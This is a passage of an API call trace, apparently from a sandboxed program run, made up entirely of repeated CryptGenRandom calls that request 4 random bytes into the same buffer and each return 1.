0x8 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.714] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.715] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.716] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: 